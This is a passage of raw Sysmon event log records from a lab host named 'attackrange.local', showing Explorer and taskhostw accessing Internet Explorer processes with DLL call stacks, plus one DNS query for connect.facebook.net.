ll+10ab33(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64) 10341000x800000000000000014272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64) 10341000x800000000000000014271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64) 10341000x800000000000000014270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64) 10341000x800000000000000014269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64) 10341000x800000000000000014268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64) 10341000x800000000000000014267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64) 10341000x800000000000000014266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64) 10341000x800000000000000014265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1cae0(wow64)|C:\Windows\System32\shcore.dll+1bb4b(wow64)|C:\Windows\System32\SHELL32.dll+1a7f8b(wow64)|C:\Windows\System32\SHELL32.dll+12ef3f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64) 10341000x800000000000000014263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+1a7f7d(wow64)|C:\Windows\System32\SHELL32.dll+12ef3f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64) 10341000x800000000000000014262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+1a7f7d(wow64)|C:\Windows\System32\SHELL32.dll+12ef3f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10aa77(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a5c4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109d6b(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.770{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.755{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.755{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:45.010{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000014302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.328{08A6967A-4781-6000-3A05-000000009A01}6928connect.facebook.net0type: 5 scontent.xx.fbcdn.net;::ffff:157.240.20.19;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000014305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:48.606{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:48.590{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:48.590{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:49.427{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:49.427{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:50.630{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:08.708{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet 